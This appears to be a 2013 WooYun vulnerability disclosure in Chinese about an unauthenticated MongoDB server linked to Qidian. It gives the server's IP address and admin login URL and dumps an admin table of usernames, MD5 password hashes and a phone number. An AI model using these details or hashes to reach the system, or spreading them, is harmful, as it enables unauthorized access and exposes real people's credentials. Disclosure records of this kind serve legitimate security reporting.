当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028524

漏洞标题:起点中文网MongoDB配置错误导致账户密码泄漏

相关厂商:盛大网络

漏洞作者: P w

提交时间:2013-07-11 11:17

修复时间:2013-08-25 11:18

公开时间:2013-08-25 11:18

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-11: 细节已通知厂商并且等待厂商处理中
2013-07-11: 厂商已经确认,细节仅向厂商公开
2013-07-21: 细节向核心白帽子及相关领域专家公开
2013-07-31: 细节向普通白帽子公开
2013-08-10: 细节向实习白帽子公开
2013-08-25: 细节向公众公开

简要描述:

被降级为实习白帽子了,都不能看漏洞了,赶紧提交一个。

详细说明:

112.90.56.99 Soldier Admin Manager MongoDB开启外链,没有密码,导致可连接数据库。
可登录http://112.90.56.99/index.php/admin/login?error=error%20password%20or%20username

漏洞证明:

> db.admin.find()
{ "_id" : ObjectId("4ef04f749fb0241843002177"), "id" : NumberLong(1), "level" : NumberLong(1), "password" : "56281fa475cfad74e8ca1b0740ae3d93", "permission" : [ ], "username" : "gaolei" }
{ "_id" : ObjectId("4ef9943c9fb024045f004b02"), "username" : "xiaozhong", "password" : "770c18b97467c2e65f5c0562a91303f6", "level" : NumberLong(1), "permission" : [ ], "id" : 3 }
{ "_id" : ObjectId("4ef994649fb0241a0f0003ec"), "username" : "xiaoyang", "password" : "04a3dd5b88fbba9d81eef26cbe6e8d68", "level" : NumberLong(1), "permission" : [ ], "id" : 4 }
{ "_id" : ObjectId("4ef994879fb024ae0e0005c5"), "username" : "shane", "password" : "dfa3cfc2ac1554ae2445356ee3ee6fbc", "level" : NumberLong(1), "permission" : [ ], "id" : 5 }
{ "_id" : ObjectId("4ef994949fb024e62700f779"), "username" : "admin", "password" : "d21a06ba99b6f5662fa70b83bffc1731", "level" : NumberLong(1), "permission" : [ ], "id" : 6 }
{ "_id" : ObjectId("4ef994a99fb024021c01a5bc"), "username" : "fan", "password" : "2e2760c5079b3228193700142921a97f", "level" : NumberLong(1), "permission" : [ ], "id" : 7 }
{ "_id" : ObjectId("4ef9955d9fb024021c01a5dc"), "id" : 8, "level" : NumberLong(1), "password" : "f57bacf82ac851b0b4bc1132d4c49789", "permission" : [ ], "username" : "yanghua" }
{ "_id" : ObjectId("4efd72ee9fb024021c024f83"), "username" : "cindi-zq", "password" : "71dc34440e35e3c97b5117019d9d1f7e", "level" : NumberLong(1), "permission" : [ ], "id" : 9 }
{ "_id" : ObjectId("4efd73449fb024045f00f040"), "username" : "kf-zq", "password" : "0dc01ae17523294a3e311bf3305aed32", "level" : NumberLong(3), "permission" : [ ], "id" : 10 }
{ "_id" : ObjectId("4efd73639fb0245a1600944e"), "username" : "qidian", "password" : "b41c161c9b8d83e34201bd3f57b733ca", "level" : NumberLong(4), "permission" : [ ], "id" : 11 }
{ "_id" : ObjectId("4f5457289fb0241c53000c24"), "username" : "sw-zq", "password" : "24789b5f2acf3988a56a570bf05d244b", "level" : NumberLong(4), "permission" : [ "usermanager", "pay" ], "id" : 12 }
{ "_id" : ObjectId("4f557e849fb024445d003f65"), "username" : "13818751352", "password" : "b52c0992c2d18eddbad0c05bac922cee", "level" : NumberLong(1), "permission" : [ ], "id" : 13 }


QQ截图20130711103649.jpg

修复方案:

版权声明:转载请注明来源 P w@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-07-11 17:47

厂商回复:

已确认漏洞发生的系统不属于起点维护,已通报以前的合作方,合作方表示并非核心应用,晚一点会修复,感谢白帽子的报告。

最新状态:

暂无